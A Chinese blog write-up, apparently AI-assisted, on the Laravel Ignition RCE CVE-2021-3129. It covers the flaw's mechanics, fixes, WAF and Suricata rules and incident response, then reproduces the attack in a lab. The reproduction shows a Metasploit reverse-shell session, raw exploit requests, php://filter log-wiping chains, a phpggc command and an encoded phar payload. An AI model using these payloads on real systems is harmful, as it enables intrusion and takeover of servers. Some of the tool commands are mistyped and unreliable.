laravel/CVE-2021-3129
CVE-2021-3129 是近几年被大规模自动化利用的 Laravel 远程代码执行漏洞之一,真实环境中被用于批量打 WebShell、挖矿和内网横向。
一、漏洞概述
Laravel
漏洞编号:CVE-2021-3129
漏洞组件:Ignition(错误调试组件)
漏洞类型:远程代码执行(RCE)
触发条件:
- Laravel 处于 APP_DEBUG=true
- 使用
facade/ignition - 端点
/ _ignition/execute-solution可访问
二、漏洞原理分析
核心本质
Laravel 在 Debug 模式下暴露 Ignition 端点:
POST /_ignition/execute-solution
该接口允许执行“修复建议(Solution)”,其中包含:
{
"solution": "Facade\Ignition\Solutions\MakeViewVariableOptionalSolution",
"parameters": {
"variableName": "..."
}
}
问题在于:
👉 该接口允许攻击者通过特定参数修改日志文件
👉 结合 PHP 的 phar:// 反序列化特性
👉 触发反序列化
👉 执行任意代码
三、漏洞利用链路图示
📌 攻击流程拆解
公网访问
↓
/_ignition/execute-solution
↓
写入恶意 phar 到日志
↓
修改日志路径为 phar://
↓
触发反序列化
↓
RCE
四、技术细节拆解
1️⃣ 攻击者构造 payload
利用 PHP 反序列化 gadget 链:
常见利用链:
MonologLaravel SerializableClosurePHPGGC 生成 payload
2️⃣ 攻击步骤
- 清空日志
- 写入恶意 phar payload
- 修改日志路径
- 触发 phar 解析
五、攻击链构建(Kill Chain)
① Recon(侦察)
- 访问
/ _ignition/health-check - 识别 Laravel 版本
- 检测 APP_DEBUG
② Weaponization
使用 PHPGGC 生成:
phpggc Laravel/RCE1 system id -p phar
③ Delivery
POST /_ignition/execute-solution
④ Exploitation
触发 phar 反序列化
⑤ Persistence
- 写 WebShell
- 添加计划任务
- 下载矿机
⑥ Lateral Movement
- 扫描内网 Redis
- 爆破数据库
六、STRIDE 威胁建模
| 类型 | 体现 |
|---|---|
| S | 伪造内部调试请求 |
| T | 篡改日志文件 |
| R | 隐蔽命令执行 |
| I | 读取 .env 文件 |
| D | 资源耗尽 |
| E | 提权 |
七、ATT&CK 战术映射
| 阶段 | 技术 |
|---|---|
| Initial Access | T1190 公网应用漏洞利用 |
| Execution | T1059.004 Unix Shell |
| Persistence | T1505.003 WebShell |
| Discovery | T1083 文件发现 |
| Lateral Movement | T1021 |
| Impact | T1496 挖矿 |
八、修复建议(官方建议)
✅ 1. 升级
升级 Laravel 到修复版本:
>= 8.4.2
>= 7.30.4
>= 6.20.14
✅ 2. 关闭 Debug
APP_DEBUG=false
✅ 3. 禁止公网访问
通过 Nginx:
location ~ ^/_ignition {
deny all;
}
九、伪代码修复示例
❌ 漏洞逻辑(简化)
if (APP_DEBUG) {
Route::post('/_ignition/execute-solution', function($request){
$solution = $request->solution;
execute($solution);
});
}
✅ 安全修复逻辑
if (APP_ENV === 'local') {
Route::post('/_ignition/execute-solution', function($request){
abort(403);
});
}
或:
if (!isTrustedIP(request()->ip())) {
abort(403);
}
十、检测与防护规则
1️⃣ WAF 规则
匹配 URI:
/_ignition/execute-solution
匹配 phar:
phar://
匹配:
Facade\Ignition
2️⃣ Suricata 示例
alert http any any -> any any (
msg:"Laravel CVE-2021-3129 RCE Attempt";
content:"/_ignition/execute-solution";
sid:3129;
rev:1;
)
3️⃣ 主机层检测
检测 PHP 调用系统命令:
ps aux | grep php
检测 WebShell:
find /var/www -name "*.php" -mtime -1
4️⃣ 日志检测(SIEM 思路)
WHERE request_uri LIKE "%_ignition%"
十一、应急响应流程
① 立即隔离
systemctl stop php-fpm
② 检查 WebShell
grep -R "eval(" /var/www
③ 检查 .env 是否泄露
cat .env
④ 检查计划任务
crontab -l
⑤ 网络连接
netstat -antp
⑥ 日志溯源
grep "_ignition" access.log
十二、真实风险情况
该漏洞在 2021 年被大规模利用:
- 自动化扫描器
- 批量挖矿
- 云服务器沦陷
其危险程度来自:
Debug 模式默认暴露在公网
十三、企业级防御闭环
开发阶段 → 禁止Debug上线
部署阶段 → 仅内网可访问
运行阶段 → WAF拦截
主机层 → 监控PHP执行
SOC → 攻击链分析
十四、核心总结
CVE-2021-3129 的本质:
调试接口暴露 + 文件写入 + phar反序列化 = RCE
它是典型的:
- “开发便利性功能被滥用”
- “环境配置错误导致高危”
准备工作
Docker的常用命令
docker compose pull #将远程镜像拉取到本地
docker compose up -d #启动容器,并且不包含下载日志
docker ps #查看开放端口
docker compose logs #查看日志
docker compose down #销毁容器
docker compose build #重启容器
docker compose exec web bash #进入名为web的服务容器并打开 Bash 终端的命令
漏洞复现
方法1
这里直接用msf,因为msf里面找到了该版本的漏洞,操作起来更加方便和迅速。
msfconsole -q
msf > search laravel
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/linux/http/invoiceninja_unauth_rce_cve_2024_55555 2024-12-13 excellent Yes Invoice Ninja unauthenticated PHP Deserialization Vulnerability
1 _ target: PHP . . . .
2 _ target: Unix/Linux Command . . . .
3 exploit/linux/http/invoiceshelf_unauth_rce_cve_2024_55556 2024-12-13 excellent Yes InvoiceShelf unauthenticated PHP Deserialization Vulnerability
4 _ target: PHP . . . .
5 _ target: Unix/Linux Command . . . .
6 exploit/unix/http/laravel_token_unserialize_exec 2018-08-07 excellent Yes PHP Laravel Framework token Unserialize Remote Command Execution
7 exploit/multi/php/ignition_laravel_debug_rce 2021-01-13 excellent Yes Unauthenticated remote code execution in Ignition
8 _ target: Unix (In-Memory) . . . .
9 _ target: Windows (In-Memory) . . . .
Interact with a module by name or index. For example info 9, use 9 or use exploit/multi/php/ignition_laravel_debug_rce
After interacting with a module you can manually set a TARGET with set TARGET 'Windows (In-Memory)'
msf > Interrupt: use the 'exit' command to quit
msf > use exploit/multi/php/ignition_laravel_debug_rce
[*] Using configured payload cmd/unix/reverse_bash
| 参数名 | 含义 | 作用 |
|---|---|---|
| RHOSTS | 目标主机的 IP 地址或主机名 | 指定你要攻击的目标机器(运行着存在漏洞的 Laravel 应用) |
| RPORT | 目标主机上 Web 服务监听的端口 | 通常是 80 或 8080,取决于应用配置 |
| LHOST | 攻击机(你的 Metasploit 所在机器)的 IP 地址 | 用于反向连接:目标会主动连接到你指定的 IP 和端口(LPORT) |
msf exploit(multi/php/ignition_laravel_debug_rce) > info
Name: Unauthenticated remote code execution in Ignition
Module: exploit/multi/php/ignition_laravel_debug_rce
Platform: Unix, Windows
Arch: cmd
Privileged: No
License: Metasploit Framework License (BSD)
Rank: Excellent
Disclosed: 2021-01-13
Provided by:
Heyder Andrade <eu@heyderandrade.org>
ambionics
Module side effects:
ioc-in-logs
Module stability:
crash-safe
Module reliability:
repeatable-session
Available targets:
Id Name
-- ----
=> 0 Unix (In-Memory)
1 Windows (In-Memory)
Check supported:
Yes
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
LOGFILE no Laravel log file absolute path
Proxies no A proxy chain of format type:host:port[,type:host:port][...]. Supported proxies: sapni, socks4, http, socks5, socks5h
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI /_ignition/execute-solution yes Ignition execute solution path
VHOST no HTTP server virtual host
Payload information:
Description:
Ignition before 2.5.2, as used in Laravel and other products,
allows unauthenticated remote attackers to execute arbitrary code
because of insecure usage of file_get_contents() and file_put_contents().
This is exploitable on sites using debug mode with Laravel before 8.4.2.
References:
https://nvd.nist.gov/vuln/detail/CVE-2021-3129
https://www.ambionics.io/blog/laravel-debug-rce
View the full module info with the info -d command.
sf exploit(multi/php/ignition_laravel_debug_rce) > options
Module options (exploit/multi/php/ignition_laravel_debug_rce):
Name Current Setting Required Description
---- --------------- -------- -----------
LOGFILE no Laravel log file absolute path
Proxies no A proxy chain of format type:host:port[,type:host:port][...]. Supported proxies: sapni, socks4, http, socks5, socks5h
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI /_ignition/execute-solution yes Ignition execute solution path
VHOST no HTTP server virtual host
Payload options (cmd/unix/reverse_bash):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Unix (In-Memory)
View the full module info with the info, or info -d command.
msf exploit(multi/php/ignition_laravel_debug_rce) > set rhosts 192.168.0.41
rhosts => 192.168.0.41
msf exploit(multi/php/ignition_laravel_debug_rce) > set rport 8080
rport => 8080
msf exploit(multi/php/ignition_laravel_debug_rce) > set lhost 192.168.0.41
lhost => 192.168.0.41
msf exploit(multi/php/ignition_laravel_debug_rce) > run
[*] Started reverse TCP handler on 192.168.0.41:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking component version to 192.168.0.41:8080
[+] The target appears to be vulnerable.
[*] Command shell session 1 opened (192.168.0.41:4444 -> 172.18.0.2:41486) at 2026-03-02 15:56:58 +0800
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
uname -a
Linux e05c650ff508 6.18.5+kali-amd64 #1 SMP PREEMPT_DYNAMIC Kali 6.18.5-1kali1 (2026-01-19) x86_64 GNU/Linux
shell
[*] Trying to find binary 'python' on the target machine
[-] python not found
[*] Trying to find binary 'python3' on the target machine
[-] python3 not found
[*] Trying to find binary 'script' on the target machine
[*] Found script at /usr/bin/script
[*] Using `script` to pop up an interactive shell
bash
bash
www-data@e05c650ff508:/var/www/html$ whoami
whoami
www-data
www-data@e05c650ff508:/var/www/html$ ls -al
ls -al
total 28
drwxr-xr-x 1 www-data www-data 4096 Nov 17 2020 .
drwxr-xr-x 1 www-data www-data 4096 Feb 5 2021 ..
-rw-r--r-- 1 www-data www-data 603 Nov 17 2020 .htaccess
-rw-r--r-- 1 www-data www-data 0 Nov 17 2020 favicon.ico
-rw-r--r-- 1 www-data www-data 1731 Nov 17 2020 index.php
-rw-r--r-- 1 www-data www-data 24 Nov 17 2020 robots.txt
-rw-r--r-- 1 www-data www-data 1194 Nov 17 2020 web.config
www-data@e05c650ff508:/var/www/html$ pwd
pwd
/var/www/html
www-data@e05c650ff508:/var/www/html$ exit
exit
exit
$ exit
exit
Script done, file is /dev/null
q
sh: 20: q: not found
q
sh: 21: q: not found
^C
Abort session 1? [y/N] ^C
[*] 192.168.0.41 - Command shell session 1 closed. Reason: User exit
msf exploit(multi/php/ignition_laravel_debug_rce) > Interrupt: use the 'exit' command to quit
msf exploit(multi/php/ignition_laravel_debug_rce) > exit
msf这里整体的使用指南如下:
搜索框架历史漏洞-->进入指定漏洞路径-->查看相关信息和操作命令-->设置操作地址和端口-->进入shell终端-->查看权限与身份。按照ATT&CK指南,后续肯定还有定时任务和数据窃取,痕迹清除等操作,这里省略。
方法2
- 对/_ignition/execute-solution接口进行post传参,修改Content-Type为application/json,添加json数据。
POST /_ignition/execute-solution HTTP/1.1
Host: 192.168.0.41:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Connection: close
Content-Type: application/json
Content-Length: 173
{
"solution": "Facade\Ignition\Solutions\MakeViewVariableOptionalSolution",
"parameters": {
"variableName": "username",
"viewFile": "xxxxxx"
}
}
后续基本上是viewFile参数值的修改,同时随着Content-Length的变化罢了,所以后续不给出完整的数据包。
git clone https://github.com/ambionices/phpggc.git
wget https://github.com/ambionices/phpggc/archive/refs/heads/master.zip
unzip master.zip
cd master.zip
./phpgcc
第3步之前的准备工作,按上面俩张图片的命令准备即可。
- viewFile参数修改,发送下面的数据将日志清除
php://filter/write=convert.iconv.utf-8.utf-16be|convert.quoted-printable-encode|convert.iconv.utf-16be.utf-8|convert.base64-decode/resource=../storage/logs/laravel.log
3.用phpggc生成序列化利用POC
php -d "phar.readonly=0" ./phpggc Laravel/RCE5 "phpinfo();" --phar phar -o php://output | base64 -w 0 | python -c "import sys;print(''.join(['=' + hex(ord(i))[2:] + '=00' for i in sys.stdin.read()]).upper())"
4,
"viewFile": "AA",发送如下数据包,给Log增加一次前缀
5,给POC后面在加一个A,不然会报错
=50=00=44=00=39=00=77=00=61=00=48=00=41=00=67=00=58=00=31=00=39=00=49=00=51=00=55=00=78=00=55=00=58=00=30=00=4E=00=50=00=54=00=56=00=42=00=4A=00=54=00=45=00=56=00=53=00=4B=00=43=00=6B=00=37=00=49=00=44=00=38=00=2B=00=44=00=51=00=72=00=2B=00=41=00=51=00=41=00=41=00=41=00=51=00=41=00=41=00=41=00=42=00=45=00=41=00=41=00=41=00=41=00=42=00=41=00=41=00=41=00=41=00=41=00=41=00=44=00=49=00=41=00=51=00=41=00=41=00=54=00=7A=00=6F=00=30=00=4D=00=44=00=6F=00=69=00=53=00=57=00=78=00=73=00=64=00=57=00=31=00=70=00=62=00=6D=00=46=00=30=00=5A=00=56=00=78=00=43=00=63=00=6D=00=39=00=68=00=5A=00=47=00=4E=00=68=00=63=00=33=00=52=00=70=00=62=00=6D=00=64=00=63=00=55=00=47=00=56=00=75=00=5A=00=47=00=6C=00=75=00=5A=00=30=00=4A=00=79=00=62=00=32=00=46=00=6B=00=59=00=32=00=46=00=7A=00=64=00=43=00=49=00=36=00=4D=00=6A=00=70=00=37=00=63=00=7A=00=6F=00=35=00=4F=00=69=00=49=00=41=00=4B=00=67=00=42=00=6C=00=64=00=6D=00=56=00=75=00=64=00=48=00=4D=00=69=00=4F=00=30=00=38=00=36=00=4D=00=6A=00=55=00=36=00=49=00=6B=00=6C=00=73=00=62=00=48=00=56=00=74=00=61=00=57=00=35=00=68=00=64=00=47=00=56=00=63=00=51=00=6E=00=56=00=7A=00=58=00=45=00=52=00=70=00=63=00=33=00=42=00=68=00=64=00=47=00=4E=00=6F=00=5A=00=58=00=49=00=69=00=4F=00=6A=00=45=00=36=00=65=00=33=00=4D=00=36=00=4D=00=54=00=59=00=36=00=49=00=67=00=41=00=71=00=41=00=48=00=46=00=31=00=5A=00=58=00=56=00=6C=00=55=00=6D=00=56=00=7A=00=62=00=32=00=78=00=32=00=5A=00=58=00=49=00=69=00=4F=00=32=00=45=00=36=00=4D=00=6A=00=70=00=37=00=61=00=54=00=6F=00=77=00=4F=00=30=00=38=00=36=00=4D=00=6A=00=55=00=36=00=49=00=6B=00=31=00=76=00=59=00=32=00=74=00=6C=00=63=00=6E=00=6C=00=63=00=54=00=47=00=39=00=68=00=5A=00=47=00=56=00=79=00=58=00=45=00=56=00=32=00=59=00=57=00=78=00=4D=00=62=00=32=00=46=00=6B=00=5A=00=58=00=49=00=69=00=4F=00=6A=00=41=00=36=00=65=00=33=00=31=00=70=00=4F=00=6A=00=45=00=37=00=63=00=7A=00=6F=00=30=00=4F=00=69=00=4A=00=73=00=62=00=32=00=46=00=6B=00=49=00=6A=00=74=00=39=00=66=00=58=00=4D=00=36=00=4F=00=44=00=6F=00=69=00=41=00=43=00=6F=00=41=00=5A=00=58=00=5A=00=6C=00=62=00=6E=00=51=00=69=00=4F=00=30=00=38=00=36=00=4D=00=7A=00=67=00=36=00=49=00=6B=00=6C=00=73=00=62=00=48=00=56=00=74=00=61=00=57=00=35=00=68=00=64=00=47=00=56=00=63=00=51=00=6E=00=4A=00=76=00=59=00=57=00=52=00=6A=00=59=00=58=00=4E=00=30=00=61=00=57=00=35=00=6E=00=58=00=45=00=4A=00=79=00=62=00=32=00=46=00=6B=00=59=00=32=00=46=00=7A=00=64=00=45=00=56=00=32=00=5A=00=57=00=35=00=30=00=49=00=6A=00=6F=00=78=00=4F=00=6E=00=74=00=7A=00=4F=00=6A=00=45=00=77=00=4F=00=69=00=4A=00=6A=00=62=00=32=00=35=00=75=00=5A=00=57=00=4E=00=30=00=61=00=57=00=39=00=75=00=49=00=6A=00=74=00=50=00=4F=00=6A=00=4D=00=79=00=4F=00=69=00=4A=00=4E=00=62=00=32=00=4E=00=72=00=5A=00=58=00=4A=00=35=00=58=00=45=00=64=00=6C=00=62=00=6D=00=56=00=79=00=59=00=58=00=52=00=76=00=63=00=6C=00=78=00=4E=00=62=00=32=00=4E=00=72=00=52=00=47=00=56=00=6D=00=61=00=57=00=35=00=70=00=64=00=47=00=6C=00=76=00=62=00=69=00=49=00=36=00=4D=00=6A=00=70=00=37=00=63=00=7A=00=6F=00=35=00=4F=00=69=00=49=00=41=00=4B=00=67=00=42=00=6A=00=62=00=32=00=35=00=6D=00=61=00=57=00=63=00=69=00=4F=00=30=00=38=00=36=00=4D=00=7A=00=55=00=36=00=49=00=6B=00=31=00=76=00=59=00=32=00=74=00=6C=00=63=00=6E=00=6C=00=63=00=52=00=32=00=56=00=75=00=5A=00=58=00=4A=00=68=00=64=00=47=00=39=00=79=00=58=00=45=00=31=00=76=00=59=00=32=00=74=00=44=00=62=00=32=00=35=00=6D=00=61=00=57=00=64=00=31=00=63=00=6D=00=46=00=30=00=61=00=57=00=39=00=75=00=49=00=6A=00=6F=00=78=00=4F=00=6E=00=74=00=7A=00=4F=00=6A=00=63=00=36=00=49=00=67=00=41=00=71=00=41=00=47=00=35=00=68=00=62=00=57=00=55=00=69=00=4F=00=33=00=4D=00=36=00=4E=00=7A=00=6F=00=69=00=59=00=57=00=4A=00=6A=00=5A=00=47=00=56=00=6D=00=5A=00=79=00=49=00=37=00=66=00=58=00=4D=00=36=00=4E=00=7A=00=6F=00=69=00=41=00=43=00=6F=00=41=00=59=00=32=00=39=00=6B=00=5A=00=53=00=49=00=37=00=63=00=7A=00=6F=00=79=00=4E=00=54=00=6F=00=69=00=50=00=44=00=39=00=77=00=61=00=48=00=41=00=67=00=63=00=47=00=68=00=77=00=61=00=57=00=35=00=6D=00=62=00=79=00=67=00=70=00=4F=00=79=00=42=00=6C=00=65=00=47=00=6C=00=30=00=4F=00=79=00=41=00=2F=00=50=00=69=00=49=00=37=00=66=00=58=00=31=00=39=00=43=00=41=00=41=00=41=00=41=00=48=00=52=00=6C=00=63=00=33=00=51=00=75=00=64=00=48=00=68=00=30=00=42=00=41=00=41=00=41=00=41=00=41=00=41=00=41=00=41=00=41=00=41=00=45=00=41=00=41=00=41=00=41=00=44=00=48=00=35=00=2F=00=32=00=4C=00=51=00=42=00=41=00=41=00=41=00=41=00=41=00=41=00=41=00=41=00=64=00=47=00=56=00=7A=00=64=00=47=00=6A=00=38=00=32=00=55=00=4C=00=68=00=55=00=6B=00=33=00=71=00=56=00=58=00=74=00=44=00=45=00=4E=00=67=00=74=00=68=00=48=00=58=00=30=00=67=00=71=00=76=00=72=00=41=00=67=00=41=00=41=00=41=00=45=00=64=00=43=00=54=00=55=00=49=00=3D=00 A //添加的A
6.发送如下数据包,对Log文件进行清理
POST /_ignition/execute-solution HTTP/1.1
Host: localhost:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Connection: close
Content-Type: application/json
Content-Length: 299
{
"solution": "Facade\Ignition\Solutions\MakeViewVariableOptionalSolution",
"parameters": {
"variableName": "username",
"viewFile": "php://filter/write=convert.quoted-printable-decode|convert.iconv.utf-16le.utf-8|convert.base64-decode/resource=../storage/logs/laravel.log"
}
}
7.使用
phar://进行反序列化,执行任意代码
phar:///var/www/storage/logs/laravel.log/test.txt
这里没截到成功的图,而是一直302报错。个人怀疑是第6步的原因导致得重来好多次,我来了好几次都没有成功。于是我没这个耐心了,当时头也有点晕乎乎的。其次,其余原因可能是POC后没添加A或者phpinfo()已经被禁用了。
参考文章: 1.9 封私信 / 36 条消息) CVE漏洞系列之—Laravel Ignition 2.5.1 代码执行漏洞(CVE-2021-3129) - 知乎 zhuanlan.zhihu.com/p/193205218…
2.vulhub CVE-2021-3129 Laravel Debug mode RCE漏洞 - 牢泠 - 博客园 www.cnblogs.com/LLINGZI/art…
3.vulhub/laravel/CVE-2021-3129 at master · vulhub/vulhub github.com/vulhub/vulh…
创作声明
AI创作声明
本文由AI辅助创作,经作者人工审核与修订。内容旨在技术交流与学习,如有疏漏或错误,欢迎指正。
免责声明
本文内容仅供学习与研究用途,不保证完全准确或适用于所有环境。读者依据本文操作所产生的一切后果,作者及平台不承担任何法律责任。请遵守法律法规,勿将技术用于非法目的。
版权声明
本文为原创内容,版权归作者所有。未经授权,禁止商业用途转载。非商业转载请注明出处并保留本声明。
